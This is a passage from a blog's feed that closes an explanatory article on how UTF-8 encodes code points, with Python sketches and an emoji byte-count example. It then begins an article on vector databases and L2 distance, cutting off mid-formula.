&lt;p&gt;Fun fact: JavaScript encodes strings as UTF-16. This isn&#39;t meant as some kind of &#39;lol JavaScript&#39; remark, I just think it&#39;s interesting.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Onto the actual encoding itself. UTF-8 is a variable-width encoding, so the number of bytes you&#39;ll need depends on the code point you&#39;re looking to encode:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Required Bytes&lt;/th&gt;
&lt;th&gt;Start Code Point&lt;/th&gt;
&lt;th&gt;End Code Point&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;U+0000&lt;/td&gt;
&lt;td&gt;U+007F&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;U+0080&lt;/td&gt;
&lt;td&gt;U+07FF&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;U+0800&lt;/td&gt;
&lt;td&gt;U+FFFF&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;U+10000&lt;/td&gt;
&lt;td&gt;U+10FFFF&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;You can break it down like this:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Single byte characters cover ASCII (0-127)&lt;/li&gt;
&lt;li&gt;Two byte characters cover most Latin-script alphabets and some other scripts&lt;/li&gt;
&lt;li&gt;Three byte characters cover the rest of the Basic Multilingual Plane (BMP)&lt;/li&gt;
&lt;li&gt;Four byte characters cover all supplementary planes, including emoji and rare historical scripts&lt;/li&gt;
&lt;/ul&gt;
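&lt;p&gt;The table translates almost directly into code. This is a minimal Python sketch, with &lt;code&gt;UTF8_RANGES&lt;/code&gt; and &lt;code&gt;utf8_length&lt;/code&gt; as hypothetical names for this example. It deliberately ignores the surrogate range inside the three-byte row, which can&#39;t be encoded on its own.&lt;/p&gt;

```python
# Each entry pairs a byte count with the code points that need it.
# range() excludes its end value, so each end is one past the table's.
UTF8_RANGES = [
    (1, range(0x0000, 0x0080)),
    (2, range(0x0080, 0x0800)),
    (3, range(0x0800, 0x10000)),
    (4, range(0x10000, 0x110000)),
]


def utf8_length(code_point: int) -> int:
    """Return how many bytes UTF-8 needs for a single code point."""
    for length, code_points in UTF8_RANGES:
        if code_point in code_points:
            return length
    raise ValueError(f"U+{code_point:X} is outside the Unicode code space")


print(utf8_length(0x41))     # 1
print(utf8_length(0x398))    # 2
print(utf8_length(0x1F602))  # 4
```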
&lt;p&gt;For an example, let&#39;s start with &lt;code&gt;U+1F602&lt;/code&gt;, more commonly identified as the &lt;code&gt;Face With Tears of Joy&lt;/code&gt; emoji. That code point will get encoded as four bytes in UTF-8. In the buttons below you&#39;ll also see &lt;code&gt;읥&lt;/code&gt;, &lt;code&gt;Θ&lt;/code&gt; and &lt;code&gt;A&lt;/code&gt; - which are encoded as three, two and one byte, respectively.&lt;/p&gt;
&lt;p&gt;You&#39;ll also notice that some &lt;em&gt;extra&lt;/em&gt; bits sneak in. These clever little bits contain valuable additional information for anything decoding your UTF-8.&lt;/p&gt;
&lt;p&gt;&lt;utf8-bit-distribution&gt;&lt;/utf8-bit-distribution&gt;&lt;/p&gt;
&lt;p&gt;We start with the code point represented as binary - the &lt;code&gt;1F602&lt;/code&gt; in &lt;code&gt;U+1F602&lt;/code&gt; - and distribute those bits across the necessary amount of bytes as per the encoding rules. These are colour coded so you can see where they all end up. As for those other, weird &lt;em&gt;extra&lt;/em&gt; bits:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Two, three and four byte UTF-8 encodings start with two, three or four &lt;code&gt;1&lt;/code&gt;s followed by a &lt;code&gt;0&lt;/code&gt;, so that whatever ends up &lt;em&gt;decoding&lt;/em&gt; this knows how many bytes to read and parse. A one-byte encoding starts with a &lt;code&gt;0&lt;/code&gt; to ensure ASCII compatibility.&lt;/li&gt;
&lt;li&gt;The second, third or fourth bytes of a UTF-8 encoding start with &lt;code&gt;10&lt;/code&gt;, so you know that they&#39;re following on from something else. Notice how it&#39;s not possible for a valid &lt;em&gt;first&lt;/em&gt; byte to ever start with &lt;code&gt;10&lt;/code&gt;, which is very clever. If you&#39;re ever parsing UTF-8 and you stumble upon an unexpected byte starting with &lt;code&gt;10&lt;/code&gt;, you can know straight away that something&#39;s got jumbled up.&lt;/li&gt;
&lt;/ul&gt;
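&lt;p&gt;Those two rules are enough to write a toy encoder. What follows is a sketch in Python under a few assumptions: &lt;code&gt;encode_utf8&lt;/code&gt; and &lt;code&gt;sequence_length&lt;/code&gt; are hypothetical names, surrogates aren&#39;t rejected, and dividing by 64 stands in for shifting six bits to the right (the two are equivalent for non-negative integers). In real code you&#39;d reach for &lt;code&gt;str.encode&lt;/code&gt;.&lt;/p&gt;

```python
def encode_utf8(code_point: int) -> bytes:
    """Encode one code point by distributing its bits across bytes."""
    if code_point in range(0x80):
        return bytes([code_point])            # 0xxxxxxx

    if code_point in range(0x80, 0x800):
        length, marker = 2, 0b11000000        # 110xxxxx
    elif code_point in range(0x800, 0x10000):
        length, marker = 3, 0b11100000        # 1110xxxx
    elif code_point in range(0x10000, 0x110000):
        length, marker = 4, 0b11110000        # 11110xxx
    else:
        raise ValueError("outside the Unicode code space")

    continuation = []
    remaining = code_point
    for _ in range(length - 1):
        # Peel off the lowest six bits and tag them with the 10 prefix.
        continuation.append(0b10000000 + remaining % 64)
        remaining //= 64

    # Whatever is left fits in the free bits of the first byte.
    return bytes([marker + remaining] + continuation[::-1])


def sequence_length(first_byte: int) -> int:
    """Read the leading 1s of a first byte to learn the sequence length."""
    bits = format(first_byte, "08b")
    leading_ones = len(bits) - len(bits.lstrip("1"))
    if leading_ones == 0:
        return 1
    if leading_ones in (2, 3, 4):
        return leading_ones
    raise ValueError("not a valid first byte")


print(encode_utf8(0x1F602).hex(" "))  # f0 9f 98 82
print(sequence_length(0xF0))          # 4
```

&lt;p&gt;Passing a continuation byte such as &lt;code&gt;0x9F&lt;/code&gt; to &lt;code&gt;sequence_length&lt;/code&gt; raises an error, which is exactly the &quot;something&#39;s got jumbled up&quot; signal described above.&lt;/p&gt;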
&lt;h2 id=&quot;wrapping-up&quot; tabindex=&quot;-1&quot;&gt;&lt;a class=&quot;header-anchor&quot; href=&quot;https://martingaston.dev/articles/the-magic-of-utf8/#wrapping-up&quot;&gt;Wrapping Up&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Now we can come back to our question that we know doesn&#39;t have the most straightforward answer: why is &lt;code&gt;👩🏽‍🏫&lt;/code&gt; 15 bytes in UTF-8?&lt;/p&gt;
&lt;p&gt;We know what we&#39;re seeing visually is a glyph, and those will look different based on platform. Microsoft&#39;s FluentUI renders it as &lt;code&gt;&lt;img alt=&quot;Woman Teacher: Medium Skin Tone as interpreted by Microsoft&#39;s FluentUI&quot; src=&quot;https://martingaston.dev/articles/the-magic-of-utf8/woman_teacher_flat_medium.svg&quot; style=&quot;width: 1.5em; display: inline-block; vertical-align: middle&quot; /&gt;&lt;/code&gt;, for example, which may or may not look the same as the glyph above - depending on where you&#39;re viewing this.&lt;/p&gt;
&lt;p&gt;We also know that we should generally think in terms of grapheme clusters rather than individual code points, which is especially true for &lt;code&gt;Woman Teacher: Medium Skin Tone&lt;/code&gt;: the Unicode information which represents this single &#39;user-perceived&#39; character is made up of the following &lt;em&gt;four&lt;/em&gt; Unicode code points:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;👩 &lt;code&gt;U+1F469&lt;/code&gt;: The base emoji character for &amp;quot;Woman&amp;quot;&lt;/li&gt;
&lt;li&gt;🏽 &lt;code&gt;U+1F3FD&lt;/code&gt;: The modifier for &amp;quot;Medium Skin Tone&amp;quot;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;U+200D&lt;/code&gt;: The Zero Width Joiner (ZWJ), which makes it explicit that the previous code points are connected to the next one, which might not be interpretable on its own. This one doesn&#39;t have its own glyph information associated with it on my version of macOS, either.&lt;/li&gt;
&lt;li&gt;🏫 &lt;code&gt;U+1F3EB&lt;/code&gt;: The emoji for &amp;quot;School&amp;quot;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Put that together, and the UTF-8 encoding for this one fabulous &lt;code&gt;👩🏽‍🏫&lt;/code&gt; emoji will end up as 15 bytes made up of &lt;code&gt;👩&lt;/code&gt; = &lt;code&gt;0xF0 0x9F 0x91 0xA9&lt;/code&gt;, &lt;code&gt;🏽&lt;/code&gt; = &lt;code&gt;0xF0 0x9F 0x8F 0xBD&lt;/code&gt;, &lt;code&gt;ZWJ&lt;/code&gt; = &lt;code&gt;0xE2 0x80 0x8D&lt;/code&gt; and &lt;code&gt;🏫&lt;/code&gt; = &lt;code&gt;0xF0 0x9F 0x8F 0xAB&lt;/code&gt;.&lt;/p&gt;
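&lt;p&gt;Here&#39;s a short Python sketch that rebuilds the emoji from its four code points and checks the byte count. The variable names are illustrative. It also counts UTF-16 code units, which is one plausible way a language could arrive at a different length for the same string.&lt;/p&gt;

```python
# Woman + Medium Skin Tone + Zero Width Joiner + School.
emoji = "\U0001F469\U0001F3FD\u200D\U0001F3EB"

# UTF-8 bytes for each code point in turn, shown as hex.
per_code_point = [ch.encode("utf-8").hex(" ") for ch in emoji]

code_point_count = len(emoji)
utf8_byte_count = len(emoji.encode("utf-8"))
utf16_unit_count = len(emoji.encode("utf-16-le")) // 2

print(per_code_point)
# ['f0 9f 91 a9', 'f0 9f 8f bd', 'e2 80 8d', 'f0 9f 8f ab']
print(code_point_count)   # 4
print(utf8_byte_count)    # 15
print(utf16_unit_count)   # 7
```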
&lt;p&gt;UTF-8 is probably one of the most successful standards ever produced. This little journey has already taken us to some of the interesting spots, and hopefully made you appreciate what a fascinating accomplishment it is to have one globally-accepted standard to cover all of the world&#39;s languages.&lt;/p&gt;
&lt;hr class=&quot;footnotes-sep&quot; /&gt;
&lt;section class=&quot;footnotes&quot;&gt;
&lt;ol class=&quot;footnotes-list&quot;&gt;
&lt;li id=&quot;fn1&quot; class=&quot;footnote-item&quot;&gt;&lt;p&gt;That&#39;s &lt;code&gt;65&lt;/code&gt; in decimal, but we&#39;ll jump straight into hexadecimal because it&#39;s so commonplace when we start to go to the lower levels. I&#39;ll also refer to hexadecimal numbers with an &lt;code&gt;0x&lt;/code&gt; prefix going forward, so this would be &lt;code&gt;0x41&lt;/code&gt;. &lt;a href=&quot;https://martingaston.dev/articles/the-magic-of-utf8/#fnref1&quot; class=&quot;footnote-backref&quot;&gt;↩︎&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li id=&quot;fn2&quot; class=&quot;footnote-item&quot;&gt;&lt;p&gt;This brings us to a classic Unicode sort-of-problem: the string length of &lt;code&gt;👩🏽‍🏫&lt;/code&gt; can fluctuate across languages. Python 3.13 and Ruby 3.2 both say it&#39;s &lt;code&gt;4&lt;/code&gt;. Go 1.23 and Rust 1.83 both say &lt;code&gt;15&lt;/code&gt;. Node 20.15 says &lt;code&gt;7&lt;/code&gt;. There are perfectly logical and reasonable explanations for all of these results, and how each language &lt;em&gt;iterates&lt;/em&gt; a string will probably be more relevant for your day-to-day sanity. &lt;a href=&quot;https://martingaston.dev/articles/the-magic-of-utf8/#fnref2&quot; class=&quot;footnote-backref&quot;&gt;↩︎&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li id=&quot;fn3&quot; class=&quot;footnote-item&quot;&gt;&lt;p&gt;In the spec, Unicode favours thinking of this in its hexadecimal form of &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mn&gt;10&lt;/mn&gt;&lt;mi&gt;F&lt;/mi&gt;&lt;mi&gt;F&lt;/mi&gt;&lt;mi&gt;F&lt;/mi&gt;&lt;msub&gt;&lt;mi&gt;F&lt;/mi&gt;&lt;mn&gt;16&lt;/mn&gt;&lt;/msub&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;10FFFF_{16}&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:0.83333em;vertical-align:-0.15em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;mord mathnormal&quot; style=&quot;margin-right:0.13889em;&quot;&gt;F&lt;/span&gt;&lt;span class=&quot;mord mathnormal&quot; style=&quot;margin-right:0.13889em;&quot;&gt;F&lt;/span&gt;&lt;span class=&quot;mord mathnormal&quot; style=&quot;margin-right:0.13889em;&quot;&gt;F&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord mathnormal&quot; style=&quot;margin-right:0.13889em;&quot;&gt;F&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t vlist-t2&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.30110799999999993em;&quot;&gt;&lt;span style=&quot;top:-2.5500000000000003em;margin-left:-0.13889em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;mord 
mtight&quot;&gt;6&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-s&quot;&gt;​&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.15em;&quot;&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;. &lt;a href=&quot;https://martingaston.dev/articles/the-magic-of-utf8/#fnref3&quot; class=&quot;footnote-backref&quot;&gt;↩︎&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li id=&quot;fn4&quot; class=&quot;footnote-item&quot;&gt;&lt;p&gt;ASCII was actually conceived in the 1960s as a 7-bit encoding, partially because the teletypes and teleprinters of the time were also 7-bit. I love this because, from a 2025 perspective, it&#39;s fascinating to think of addressing blocks of memory in anything less than a byte at a time. &lt;a href=&quot;https://martingaston.dev/articles/the-magic-of-utf8/#fnref4&quot; class=&quot;footnote-backref&quot;&gt;↩︎&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;/section&gt;
</content>
  </entry>
  <entry>
    <title>What&#39;s a Vector Database Actually Doing?</title>
    <link href="https://martingaston.dev/articles/what-is-a-vector-database-actually-doing/"/>
    <updated>2024-07-16T00:00:00Z</updated>
    <id>https://martingaston.dev/articles/what-is-a-vector-database-actually-doing/</id>
    <content xml:lang="en" type="html">&lt;p&gt;Vector databases are hot right now. By the end of this article, I hope you&#39;ll have an intuitive feel for what a vector database is actually doing and how it could prove useful when we want to query things that are &lt;em&gt;similar&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;This sounds obvious, but a vector database is chiefly concerned with the efficient storage, retrieval and querying of vectors. To me, this makes them intriguingly different to most other database categories which tend to equally embrace a variety of data types - strings, integers, dates, floats and so on.&lt;/p&gt;
&lt;h2 id=&quot;how-does-it-work%3F&quot; tabindex=&quot;-1&quot;&gt;&lt;a class=&quot;header-anchor&quot; href=&quot;https://martingaston.dev/articles/what-is-a-vector-database-actually-doing/#how-does-it-work%3F&quot;&gt;How Does It Work?&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;We&#39;re going to motivate this with a little bit of maths. It&#39;s fun, I promise.&lt;/p&gt;
&lt;p&gt;Let&#39;s start by considering a pair of points&lt;sup class=&quot;footnote-ref&quot;&gt;&lt;a href=&quot;https://martingaston.dev/articles/what-is-a-vector-database-actually-doing/#fn1&quot; id=&quot;fnref1&quot;&gt;[1]&lt;/a&gt;&lt;/sup&gt; on a two-dimensional plane: &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mo stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo separator=&quot;true&quot;&gt;,&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;(4,4)&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:1em;vertical-align:-0.25em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mpunct&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.16666666666666666em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; and &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mo stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;mo&gt;−&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo separator=&quot;true&quot;&gt;,&lt;/mo&gt;&lt;mo&gt;−&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;(-4,-4)&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; 
aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:1em;vertical-align:-0.25em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;−&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mpunct&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.16666666666666666em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;−&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;. I&#39;ve selected those because it&#39;s deliciously straightforward to plot them out, and I want this article to be less than 1200 words.&lt;/p&gt;
&lt;img src=&quot;https://martingaston.dev/articles/what-is-a-vector-database-actually-doing/basic-cartesian.svg&quot; alt=&quot;three vectors plotted on a basic cartesian plane&quot; /&gt;
&lt;p&gt;Voila! You&#39;ll see those two points in &lt;span style=&quot;color: var(--amaranth-pink)&quot;&gt;pink&lt;/span&gt;, but I&#39;ve also cheekily added a third point in &lt;span style=&quot;color: var(--aquamarine)&quot;&gt;cyan&lt;/span&gt;: &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mo stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;mn&gt;3&lt;/mn&gt;&lt;mo separator=&quot;true&quot;&gt;,&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;(3,4)&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:1em;vertical-align:-0.25em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;3&lt;/span&gt;&lt;span class=&quot;mpunct&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.16666666666666666em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;. 
We can see with our own eyes that &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mo stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;mn&gt;3&lt;/mn&gt;&lt;mo separator=&quot;true&quot;&gt;,&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;(3,4)&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:1em;vertical-align:-0.25em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;3&lt;/span&gt;&lt;span class=&quot;mpunct&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.16666666666666666em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; is much closer to &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mo stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo separator=&quot;true&quot;&gt;,&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;(4,4)&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:1em;vertical-align:-0.25em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span 
class=&quot;mpunct&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.16666666666666666em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; than it is to &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mo stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;mo&gt;−&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo separator=&quot;true&quot;&gt;,&lt;/mo&gt;&lt;mo&gt;−&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;(-4,-4)&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:1em;vertical-align:-0.25em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;−&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mpunct&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.16666666666666666em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;−&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;, but as of July 2024 computers have absolutely zero intuition - so how might we calculate that? One formula we can employ is called the L2 distance&lt;sup class=&quot;footnote-ref&quot;&gt;&lt;a href=&quot;https://martingaston.dev/articles/what-is-a-vector-database-actually-doing/#fn2&quot; id=&quot;fnref2&quot;&gt;[2]&lt;/a&gt;&lt;/sup&gt;.&lt;/p&gt;
&lt;p&gt;If we wanted to calculate the L2 distance, &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mi&gt;d&lt;/mi&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;d&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:0.69444em;vertical-align:0em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord mathnormal&quot;&gt;d&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;, between points &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mi&gt;p&lt;/mi&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;p&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:0.625em;vertical-align:-0.19444em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord mathnormal&quot;&gt;p&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; and &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mi&gt;q&lt;/mi&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;q&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:0.625em;vertical-align:-0.19444em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord mathnormal&quot; 
